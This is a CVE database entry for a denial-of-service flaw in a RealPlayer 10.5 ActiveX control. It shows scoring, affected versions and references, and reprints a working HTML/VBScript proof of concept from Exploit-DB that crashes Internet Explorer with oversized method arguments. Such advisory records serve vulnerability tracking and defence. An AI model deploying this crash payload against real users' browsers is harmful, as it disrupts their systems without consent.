CVE-2006-6847 : Detail

CVE-2006-6847

6.38%V3
Network
2007-01-03
01h00 +00:00
2017-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

An ActiveX control in ierpplug.dll for RealNetworks RealPlayer 10.5 allows remote attackers to cause a denial of service (Internet Explorer 7 crash) by invoking the RealPlayer.OpenURLInPlayerBrowser method with a long second argument.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3030

Publication date : 2006-12-27 23h00 +00:00
Author : shinnai
EDB Verified : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">----------------------------------------------------------------------------- RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object> <select style="width: 404px" name="Pucca"> <option value = "GetComponentVersion">GetComponentVersion</option> <option value = "HandleAction">HandleAction</option> <option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option> <option value = "Quoting">Quoting...</option> </select> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe on error resume next if Pucca.value="GetComponentVersion" then argCount = 1 arg1=String(1000000, "A") RealPlayer.GetComponentVersion arg1 elseif Pucca.value="HandleAction" then argCount = 1 arg1=String(1000000, "A") RealPlayer.HandleAction arg1 elseif Pucca.value = "DoAutoUpdateRequest" then argCount = 3 arg1=1 arg2=String(1000000, "A") arg3=1 RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3 else MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _ "The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_ "Their tags shall blink until the end of days." end if End Sub </script> </span></span> </code></pre> # milw0rm.com [2006-12-28]

Products Mentioned

Configuraton 0

Realnetworks>>Realplayer >> Version 10.5

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1016_beta

    Realnetworks>>Realplayer >> Version 10.5_6.0.12.1040

    Realnetworks>>Realplayer >> Version 10.5_6.0.12.1053

      Realnetworks>>Realplayer >> Version 10.5_6.0.12.1056

        Realnetworks>>Realplayer >> Version 10.5_6.0.12.1059

          Realnetworks>>Realplayer >> Version 10.5_6.0.12.1069

            Realnetworks>>Realplayer >> Version 10.5_6.0.12.1235

              References

              http://www.securityfocus.com/bid/21802
              Tags : vdb-entry, x_refsource_BID
              https://www.exploit-db.com/exploits/3030
              Tags : exploit, x_refsource_EXPLOIT-DB